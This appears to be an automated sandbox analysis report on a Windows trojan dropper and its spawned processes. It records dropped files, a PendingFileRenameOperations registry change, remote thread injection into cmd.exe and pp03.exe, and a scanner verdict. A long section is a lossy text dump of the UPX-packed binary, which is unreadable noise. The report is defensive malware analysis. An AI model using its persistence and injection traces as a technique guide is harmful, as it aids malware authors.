C:\WINDOWS\system32\MSCTF.dll	0x74720000	0x0004C000
C:\WINDOWS\system32\Apphelp.dll	0x77B40000	0x00022000

8.a) jopaxx_1211198017.exe - Registry Activities

	- Registry Keys Created Or Opened:

HKLM\System\CurrentControlSet\Control\Session Manager

	- Registry Values Modified:

Key	Name	New Value
HKLM\System\CurrentControlSet\Control\Session Manager	PendingFileRenameOperations	0x5c003f003f005c0043003a005c00730061006d0070006c0065002e006500

	- Registry Values Read:

Key	Name	Value	Times
HKLM\SOFTWARE\Microsoft\CTF\SystemShared\	CUAS	0	1
HKLM\SYSTEM\WPA\MediaCenter	Installed	0	2
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	AuthenticodeEnabled	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	DefaultLevel	262144	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	PolicyScope	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	TransparentEnabled	1	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	ItemData	0x5eab304f957a49896a006c1c31154015	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	ItemSize	779	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	ItemData	0x67b0d48b343a3fd3bce9dc646704f394	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	ItemSize	517	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	ItemData	0x327802dcfef8c893dc8ab006dd847d1d	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	ItemSize	918	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	ItemData	0xbd9a2adb42ebd8560e250e4df8162f67	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	ItemSize	229	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	ItemData	0x386b085f84ecf669d36b956a22c01e80	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	ItemSize	370	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33}	ItemData	%HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache%OLK*	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33}	SaferFlags	0	1
HKLM\System\CurrentControlSet\Control\Session Manager	PendingFileRenameOperations	0x5c003f003f005c0043003a005c00730061006d0070006c0065002e006500	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Internet Explorer\Main	tp	10270	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders	Cache	C:\Documents and Settings\user\Local Settings\Temporary Internet Files	1

8.b) jopaxx_1211198017.exe - File Activities

	- Files Created:

C:\WINDOWS\9g234sdfdfgjf23

c:\355674543.bat

c:\windows\pp03.exe

	- Files Read:

C:\DOCUME~1\user\LOCALS~1\Temp\jopaxx_1211198017.exe

	- Files Modified:

C:\WINDOWS\9g234sdfdfgjf23

c:\355674543.bat

c:\windows\pp03.exe

	- Device Control Communication:

File	Control Code	Times
unnamed file	0x00390008	7

	- Memory Mapped Files:

File Name

C:\WINDOWS\system32\Apphelp.dll

C:\WINDOWS\system32\MSCTF.dll

C:\WINDOWS\system32\cmd.exe

C:\WINDOWS\system32\rpcss.dll

C:\Windows\AppPatch\sysmain.sdb

c:\355674543.bat

c:\windows\pp03.exe

8.c) jopaxx_1211198017.exe - Process Activities

	- Processes Created:

Executable	Command Line
c:\windows\pp03.exe
	c:\windows\pp03.exe
C:\WINDOWS\system32\cmd.exe
	c:\355674543.bat

	- Remote Threads Created:

Affected Process

c:\windows\pp03.exe

C:\WINDOWS\system32\cmd.exe

	- Foreign Memory Regions Read:

Process: C:\WINDOWS\system32\cmd.exe

Process: c:\windows\pp03.exe

	- Foreign Memory Regions Written:

Process: C:\WINDOWS\system32\cmd.exe

Process: c:\windows\pp03.exe

9. tt_1211198016.exe

	- General information about this executable

Analysis Reason:	Started by cmd.exe
Filename:	tt_1211198016.exe
MD5:	d05d82b80d8d4d70b83c7d8eb46231f5
SHA-1:	19371951336fa1b60669393b0f5aa0527d348c2c
File Size:	17408 Bytes
Command Line:	"C:\WINDOWS\tt_1211198016.exe" /1
Process-status at analysis end:	dead
Exit Code:	0

	- Load-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\ntdll.dll	0x7C900000	0x000AF000
C:\WINDOWS\system32\kernel32.dll	0x7C800000	0x000F6000
C:\WINDOWS\system32\MSVCRT.dll	0x77C10000	0x00058000
C:\WINDOWS\system32\USER32.dll	0x7E410000	0x00091000
C:\WINDOWS\system32\GDI32.dll	0x77F10000	0x00049000
C:\WINDOWS\system32\IMM32.DLL	0x76390000	0x0001D000
C:\WINDOWS\system32\ADVAPI32.dll	0x77DD0000	0x0009B000
C:\WINDOWS\system32\RPCRT4.dll	0x77E70000	0x00092000
C:\WINDOWS\system32\Secur32.dll	0x77FE0000	0x00011000

	- SigBuster Output

UPX All_Versions SN:1634

	- Ikarus Virus Scanner

Trojan-Dropper.Agent (Sig-Id:26780279)

	- Program output

Stdout:

MZ......................@.............................................	.!..L.!This program cannot be run in DOS mode.

$......./...k...k...k.......h.......i...k...o...	...m.......i.......o.......h...k...T...]...j.......j...Richk...........PE..L...r$.I...........!.....0.......`.......p..............................................................................@...........................................................................................................................UPX0.....`..............................UPX1.....0...p...*..................@...UPX2................................@..............................................................................................................................................................................................................................................................................................................................................................................................3.02.UPX!
	.
.v..Q.{.Az...&...X..I....w............_.	.h..... .._Y..&.0.....|QV...u..N8.E..,.*.j...... .....@0.e.........M....
.M.^d.
.?..:...X.Q.E.VW]3....._.W..-.GW.}........ Wm.e_..U.F8.~<.@D.._d.w..U....dS3.9].t%..d;.t.P<...~.Y.u.	`Y.....9.7\..
V....W.P(.Q......E..7	.=.....P.....0".5E..u....C..50|.......@....0#..t.P...4.S......s.=..u%..U....r	
....7.}l.	P..^[......b.....B.VuV.......R......d...|....F...
........#P.. ..6..$sh.......B7a.2.....^...n...e|.lK...K,(V...kn.}.4.
...~ L..t{.lj../d.~lQS?}v.......3....].3...I+...x..pg...?...>[ds...oV.F;.~.1_P..!....nsLW.HSE.V;.W....w..TOM...x......F.W.S.v..4....~...;}.}.=j.+..........j."..(l].o?.3<Wj.Y\.}...7..lns.].@....P\.=....~..<....Q......6...E.1......... Z.......-........S...LA.w.(qu.W..f.m..e.f.]..].f....
.K7....... ...6. .X
..V....F.E..F.&j+....^....PVs@_t...6gm...:t...	.{pc.(........;.V8.Wt89.t+....A.....QR.....>4..K9.u.2.j7..J...).Y'Y....u.(.......<t$.....D|.Vh.W....Q.d....X.O.<....]A...H......2\...h.\...........K[.......h.V.....>.M..0.I..m}[.o..{.v.....{j'.......~.YtjGP0/....o..tT.+..~.W........w...;.VT...w.....S..... ..t..;..^S..<S.fpA3.............8.v.6.0...4...8...B..[..4....15
..=....	.....?>.W..].Ptt&..$|..Su^.6...v.....YY..A..@L...+_8;.t9.Lt1[g......AR.H.....u.h9.)u..B..A..50....n*.
T.LX....PQ0P.kH.+>S#.^xa..jPWi...|..=..U..tu...7.u/..;...W....R....WnM.YP..5)`...r......P.P$...6{28R..(SP..q!V.....S....I...V....Z....<g;k..S.o..MSN7n..R....tIl~r.g.f,N+QPT..&.DPLH..l....u..(Z.d.....34....|..}....	
...]...w.....L.....p.J......G..@^......q.,......HF,..1.......... .tU......j?...Y...-.......nk..A{!..p.~.3$
.......&|..(..hk0..dX.....y.;..9u..bL...t..(P...y.7TPL<.r.%Z...l....
./........ V.....9.4...IX(..|... ...r.}....Hn..q:+-.'....|.'...M...2&kf.n..2u.x..&./=.T.i.+.....X...........;X.....W.p:Q.n...3.|.M}.(.b.....mt.j{...h.c...-....H.X...X.h...=.Xom4..QZ$7S.P.P...E..]...=[d.]&S...w....m
....oq.[#t.;.s......E.C...P..	.....}1.2....ft2Zl.S.K.....P............R.Y3.b.+.s.#......u..,.+...[..<
A .F...........~......<
b<
u.N..F...&lA.1O.+......w....`.x.......jT.>k+$..M.....+.....%+U....U.7{-.q.B.\....`.|..."..6o. .Fh..o....z...j..&R.!.....EV....'.X..+..
..P.t.e.....j"V........j.dYe...6a......'.[...........(..~....0....3d.....P...,dJZ..!...[.8.t"
...An}.H+...u2...W+.JN..#.~Bka........F..6....2.	..}./k!H.u.w....3u..A.x..p.....h`P.\..Sm.0F.....``D2.8...]e..1.....i........Z;$-.V
....wBx8..d..*2...
`...`k+&_ ..>W..|.....v).Y..,...+d...=k.fbT.............V....$M....3..k7.........,.2.{.V8....s.-.....%...V/.+.[V8.;2.l[..y../...nI..5.....d...%:f..
....)....../.r...G,.......OGevM.}.++.t...0.u..-...r.....@.f..%-..q....0.]7..N../JQ.S..m...P....=7.....j.H1...> D.....E.......W.x.~{..t[.+...QP.C...E..NP.Q,......T..nd...	Zg.'.s.jpV+......WhB+........e...X..u	.!- ....PFR...[.......M....~o.=.lP.d.`..y.XPHD<4.!.{0>.VZ<2H.$Vf.!.	...)..Z0....;.....]V[;.d....L...s@5........y........... ....#....P...-..(j.....lb...,)........	-..;"..A.Y.@!l.vnS.....
&D.....G.f..d..^e....s..LU(. .....>p.>%.5......2...
c...p..d.\.&.a3.........L`1e.&...M.f..9.jF..7..w..d.....#&....S5	....8....Y.....Y....F.<..~.U...g..$.T.P5!.E.........w...E.....<....J...........k-.DA..R....../x.........4.....6.}p56.~.u....PN..w...........wcI....H..t.A.BY).SKEn../w..~......g....D..<[.
J..S'+Q.........T!..8.],.x|..}..>.'
.](.$t...d]..=d.a..Ks.....?.... ....q..L2V...8 {$.[cH.u....j/Mw..=j:.Y.Y.......g.}.h..v.....B..7$.C...v.....$..+...
.@.8....}wG......Q..pl..Q..M.<....8.]4Iu....]l........L...Q}$....Z.tLjf]..|0@....<.l.hp.s+a......7...QP.......... ...b......Vd....."\...2....\.....t.....P.$G.82.-.d..K......	>}..R&.].W.n....h...;5.M.GX..j.F....[.\..	>".Hi.l.{./...M...o
....;......4I....w..W..h.......U........$f.....uH.......)......Vl.j#}../	.&X.0jU.1,h...M....Q..L.........t.A".6"%Y...'.	.^Vj{.q....&.+d. ,.....|.k.0 .....	.,:DzuI$e....t
....&..W..q....%GV....j..~... ..q.'...0.@.%.[.V.qPRGT.t5lBNV..V...?$2.+/..E.x......9	...X.........m%....+$...1.5@...54/.7/....;+.4<.W.....@.... .%...#.%. ..pb.g
..`.).\.i;L9..r	{D=P.%.8.,....R.g$1%..ec..,....\.....+1...0}..u.........9#...
Hh#..N2...n..d.9iW.7W....1._W..N.W...
..Y.0...
.I....'.Z...=.j@t....=M&.... '.@....s..h-6...../.
...Y...reT....tJ.]..%^.Eco.`.D.....h...`qR....K.t}+....l..qr9..9..Hg..d.
....	..-4..."6..;.u..@c..X.Pr.7.]0a.!..b..m.H.g..!.U.vK....S.;.j...%.{$
{_.f"....$XHN.ZU..J^d.V.dV....4..un..qH0.(.Y;.{...S-hPu@?.'.<U..U..Z.d .m-.l....].s.I&.....".m.....P..y......V...<........i3#'..9]...d...2..@..l6.6.....1.>P.	.;...'.F]....C..#0.H...uz.`.0.F.*.W..>X!..g.}[tz.f.v.tu..p.]...X.|.N.W..P.0vo....^.*......S.^..Q.t.u...G.Q.c.P:..u1..j..U/.V.9,LS.h.x..^.......l....|..+9......S.].x.
`...54..loM...9.}.+.S.....SW.;..m.....@.=0>t.....*Eu...6.:..V\...[...Q%..........UH}..@....|...4%dB.	....&.0.M.`!.
.,`H...q.l.5P <0%
.+d.c.l..C ..?0.(...}K.	.8.CVu......#P..........+}.......$8].5].%.a0.R.;.M.....Y-$....Y8U(....@2..A..F..S3.
0......;.....}	+.S...S.......Q.}.r..0rMe...H.'.."..R##x1..R..@.........V..*.V.
...}z.k(.^BV<b.1`^3...,%.x;...U
N.....F.......,..~.....0....W^..:p.[.R.gP{...\l.D..tN..aH...+h.V....i...C...
.....r....L.B.Rb...`S.C.t.>..+_;j..	i....)d.W8..[..I.Z..
V}.Y.R^.t.Lp.....].?.o..\*3z.{.+........u...`.	.......sPiP.....)N....(..=v..^H.#.C......*..l..{.=....td..B49^.^D.@.y..<840(,Xx.$ ..h*..p..P.PJ..n....3..^. .'.Pe.......9*v.&......P`.y..........y.......P...f.U..j.]....:..!.....d2.....#...L.....	.t.@..
p.........]l.G...l.j.k_.O..d..\...}.X..Ts@..]C.u.<.d4......~x_`....@"..M.4.~4v....3.v.'R........
ou....V..)...t..5.#....?.	.m...,...j9.A...._[..^..S8]z..W.^.~....k..........vW..	.F....t......$.*.q}.a..+.O..].Z.5.OIO.;.E..F 	..R..\....b._r...9}.u.&G.;.t......Q 0.R..Dk......f#.........J...,...o.N.@.....rpC.-M..u...+.D......F.}..g.'-.P.^.....KE;..S.-....`...?....\D......s...M.u.....`........t...2.+.-H....nk.O...p;."vn..kk.P}u.....n..U.Y....}Z..v.............V...g..&..0....-..[..#U.;....t...4.E...........N.b.?.......+...Ou...
.....x-...M....4.u...V........:v,.
..+...f.W..h...i....gp.M%;.9..C..m..Y0d.....;}(.+..$...u+..&.!...DR....(P!...l".M.%R...h..D.y_Gt.......c.....#pY..B.p.....K0...._.1y3..Y.s...H...%1...	.......Q=..L$.r....-...~....s(....6Xc.....@.I.....=|.D5y..->.x~n
...R.Nh".	._|u?h..P..........cf. ..
L............U..u...=c9&.0^2...!nq.;.r................a.f...%..Y^$.F5.f1A....->.	Rx..&
.t..K....u"E..WV..s..t..J..k...N.'H3.L..
..7i#.F.u&....4.!.}.t...".[...36..&Mt.lddd.A......Yd./..................L.w.X2Ph6,.;&.v.... .A I....r+.....|.X.?\...E...0..l!....+.....!....7C.9.........I..Rd...LB.N
....[..`.......2Y......AQ .........A@...0.N.......7.x...H../.. ......w^!'.1...<9H...#.,d 9.G.B @....I.R[._....d.m.yy.......'.` ..........F>.Q.t............|...Ap`.P<....0. ..4Ms...P......y...P........i...?query=.&...;?p.....IG....YMASItbn:cache	inte.>..xt:.itle.rela.d..o...url	w..ask........searI.ol...X..live7...,.?msn...K.?yahoo.v.l..g
glN...a.zr.z.HTTP/1.1 4c...04 No
..%s-dn.mK.W...cSwi.et.n....rterr..lAInn.....C'kUXsh.pi..._lwa.U(cap.lE...wne/b.CU-%9.es...uFiKSocs-c.ksm...:o.sj.k.v}...
kp..-.e.....2eWf..GET /v5o
..0/.php.%.d&sn[.o.c&v=%s&uidl.q...6. ..Uk-Age.n..v: ..Hos	R^...mkr...55k.u....fs?.X..l.~w..r=	ng.e=on&n#dow={...1pm.t.%3A.k-6r2Fs...[..5...%Wg.[{n[g=a_..a........=ht..C.}{alup"."s5".
..n.\
..t-.od7.g../cepnc.g.
.7%l..s..e......4Nt..pw.w.x?.bmt.u=/&adl[=de....m..nd.g.l.v.p..15.IDo..S..[j..g.C....f_..r._s....o^3.E..6.ns.GU.d."ur..~."g.......fp.e..3m...j7x +.%.f
.0c.t
.2\nfv-.k..y..mR...6.\..3.W@_...bl..n..s
.Z...C!c.'..c. cl.c.. ....1c.Q%.?.[.L!.s.agma:*5.Yk-9..5w..K..:/..{.s......3.....am.ggifG'..F.g/.?./ak.5.k....=....B.g..n..`...T/.n#KM.v.et.lbk.=..Ai...#..`[m/3&#x-moz....x.jpe..g.D..u..3..ci..u.p/i...u^dc.C+Vq.T.t..].hum.ai5.C5_[..Si.mm.f..{.a..cyL...lg.	y.tub...z./.?..+.c.....|}Vw0.....a.dD#d..O200 OKC.C.... no...,	...;.	mu.-..S..h$3po.6....ck=0-..)....E. Sun.uJ.ko..yz12:.. GMT.%..&P5sb\...].-Tys../....Bml.L.gL...j....<!.A3.>....>LoY...|(</....z..b.y H.cc.n...k()".f.m .....<./" .F!....../.....k.cpt>
f.*&.+l....okB(.5.Q.k,.,,.) {
	sa... (.	Gr .6.. =.ew D
};.......tT...g....)+?*24*60.1.H/.C)4M.P
.m.";..+B..3..aS..e} ...mlc 6"...[..=kn.....s..+"I.+/+BW`.dpZh25}.X@hX.d......f.EQN + P;..+....v.}.T...(';'.q....:*i)0;.<5./B.N..++T...]c#.[i].whi%..m[;cVh.AP.j.mk..'.)'g..MXFs..cR.../s.7.d.ORs..f(.=C.~..%.rn> @B...J}.0R3.B.I-u..c	$..C.....pcy#..E..p)....Zw{.. }.t....0.m$&w..v.KK.'.-1S..	..,=.B>+$KF$.e...L68>.6.;.`#...h.&..:?'.m[...u'Q.R@.....c	......4...V.f{..||...........1..s[0]...1.m.x}.fa..up5..	.....O\...@.)..k302 MoP..B..L...".~.h(`_...p.D..Tz..K	=.s..JMI.h....?qa>.POST{t...D..}..+......nbP.Q(}'h.p'.3...^... .x.E..;
.M.:D...Ok.l........loo...._GepVo.;.a$.m....:..\k.dr#.d.}.
..x3.c...l,c..D.....mcf.\dic..{...(.~VTS..w0..M..}..Bt\W..oC.......s.\R.p...bS.eJQ
..=...x.Ma.S.tm3
Rr3Tc?..9W0.+E..G.!.r..DLL.QH..M.

2.i...g.@.C.Mu.....A
GetLastError..b.Envi.n.VariableAQs..4Th.
.(`o.and)..bv.s(Fi5.H(...*
.Dele.g...Libray.P..joSAdd=...,....??1?$ba._.o...@DU.._.ait.n..s.@.d@@V.al.......2@.QAE@XZG.L.._Tidy@KAX_N@e...MD.n@....FQV1.AB.IIY/.
5n.W2I>.(.B.PBD._C@......N.R^..{QCAW.@4D..Q ?ppend.P...=eVBEHk....S?H.YA?kW.F8"0.0.S....MVS,U.EFd.....BK.2..4K..`Ldup..l..n\m
!j.Zs.._fdiv
k].....m
oV....V._T..k....nfK2GPAX.N.\....3X..f.E[.e.mt.kl.u.l/.r.p...bnk..Hpy!.v..stf
5sp.t.nm.v_._.Bog.CxxF.6X..m.r......>SH.VuA..4..S".. ....M.ag"TFns......Git...L.#P.Y~.	..M....,...s.t
....,...	... ..,..4...O..
.
*......2.
..
.
......)......
............
......>...*%.... !.
.!.......%.......<.
"	*.>$.	...$.UJ.....F...	....	?.
.)..-............!.
.....$....D....k.2..2.)...0.	..#.}........)....A%T..<......p.#..
E"W	....o....&#....@...	!.........].
..!'.\$f.#.....'..2.	...
v.........=.P	......1...6...m...
........G.......D.....w5.......5....&...'...o.[......5[&7....D.'.u..0........,*....iB....%k.g&....{..(.=.5.X....#p...v..	.....g.#
...Ks........N....'..!....&
@.....=
..)k/7".\5.......(.....	......._...y................X
....:.....	..P...._L..r$.I.YS.....!....y".. ..w...........3...I7....*...-{..F.Z..`.R.R..p.Q..\.......\a....0d/..1..g .f
6..rh..
.....'6@..&...6..TSB'...).Oe..Z...4.'.RB.X..4.T.)v...........................|$........`..p........W..........F..G..u........r........u............s.u	.......s.1....r
.....F...tt....u............u..........u A..u............s.u	.......s.............../...v...B..GIu..c.................w....L...^....2...2.....<.r
<.w.....t.,.<.w#.?.u...f........)..........................p....	.tE._...0......P............G..t...y....GPG.WH..U......	.t........a1........^.1...G	.t"<.w..................$....f........................PTj.SW......... ..`(.XPTPSW..Xa.D$.j.9.u................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ ...0...@...N.......\.......................................KERNEL32.DLL.MSVCP60.dll.MSVCRT.dll.SHLWAPI.dll.USER32.dll.WS2_32.dll...LoadLibraryA..GetProcAddress..VirtualProtect..VirtualAlloc..VirtualFree...??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ..atol..SHGetValueA...GetMessageA.......r$.I.................................8........dll32.dll.sm...........6..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

9.a) tt_1211198016.exe - File Activities

	- Files Modified:

(stdout)

10. pp03.exe

	- General information about this executable

Analysis Reason:	Started by jopaxx_1211198017.exe
Filename:	pp03.exe
Command Line:	c:\windows\pp03.exe
Process-status at analysis end:	alive
Exit Code:	0

	- Load-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\ntdll.dll	0x7C900000	0x000AF000
C:\WINDOWS\system32\kernel32.dll	0x7C800000	0x000F6000
C:\WINDOWS\system32\ADVAPI32.dll	0x77DD0000	0x0009B000
C:\WINDOWS\system32\RPCRT4.dll	0x77E70000	0x00092000
C:\WINDOWS\system32\Secur32.dll	0x77FE0000	0x00011000
C:\WINDOWS\system32\MSVCP60.dll	0x76080000	0x00065000
C:\WINDOWS\system32\msvcrt.dll	0x77C10000	0x00058000
C:\WINDOWS\system32\ole32.dll	0x774E0000	0x0013D000
C:\WINDOWS\system32\GDI32.dll	0x77F10000	0x00049000
C:\WINDOWS\system32\USER32.dll	0x7E410000	0x00091000
C:\WINDOWS\system32\OLEAUT32.dll	0x77120000	0x0008B000
C:\WINDOWS\system32\SHELL32.dll	0x7C9C0000	0x00817000
C:\WINDOWS\system32\SHLWAPI.dll	0x77F60000	0x00076000
C:\WINDOWS\system32\WININET.dll	0x42C10000	0x000CF000
C:\WINDOWS\system32\Normaliz.dll	0x00330000	0x00009000
C:\WINDOWS\system32\iertutil.dll	0x42990000	0x00045000
C:\WINDOWS\system32\WS2_32.dll

Analysis Report for 94d1649b5bb060184e8d2550a01bb9c5

Summary:

Table of Contents